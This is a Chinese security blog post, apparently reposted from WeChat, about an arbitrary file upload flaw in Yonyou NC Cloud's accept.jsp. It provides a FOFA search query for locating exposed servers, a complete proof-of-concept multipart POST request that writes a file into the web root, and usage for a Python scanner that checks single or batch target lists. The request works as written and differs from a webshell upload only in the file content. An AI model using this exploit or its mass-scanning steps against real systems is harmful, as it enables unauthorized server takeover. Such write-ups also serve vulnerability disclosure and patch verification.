用友NC Cloud accept.jsp任意文件上传漏洞

admin 2023年11月9日09:15:59评论73 views字数 877阅读2分55秒阅读模式

一、漏洞描述

NC Cloud是用友推出的大型企业数字化平台。 用友网络科技股份有限公司NC Cloud存在任意文件上传漏洞,攻击者可利用该漏洞获取服务器控制权。

用友NC Cloud accept.jsp任意文件上传漏洞

二、网络空间搜索引擎查询

fofa查询

icon_hash="1085941792"

用友NC Cloud accept.jsp任意文件上传漏洞

三、漏洞复现

POC

POST /aim/equipmap/accept.jsp HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Length: 324Content-Type: multipart/form-data; boundary=ac1485f11aa5441defff4ab45b7fb177

--ac1485f11aa5441defff4ab45b7fb177Content-Disposition: form-data; name="upload"; filename="check.txt"Content-Type: text/plain

There is a vulnerability in this website--ac1485f11aa5441defff4ab45b7fb177Content-Disposition: form-data; name="fname"

webappsnc_webcheck.txt--ac1485f11aa5441defff4ab45b7fb177--

上传成功,返回如下:

用友NC Cloud accept.jsp任意文件上传漏洞

访问

http://ip:port/check.txt

查看上传内容

用友NC Cloud accept.jsp任意文件上传漏洞

四、漏洞检测

单个检测

python AcceptUpload.py -u url

用友NC Cloud accept.jsp任意文件上传漏洞

批量检测

python AcceptUpload.py -f filename

用友NC Cloud accept.jsp任意文件上传漏洞

原文始发于微信公众号(网络安全透视镜):用友NC Cloud accept.jsp任意文件上传漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月9日09:15:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友NC Cloud accept.jsp任意文件上传漏洞https://cn-sec.com/archives/2189594.html

发表评论

匿名网友 填写信息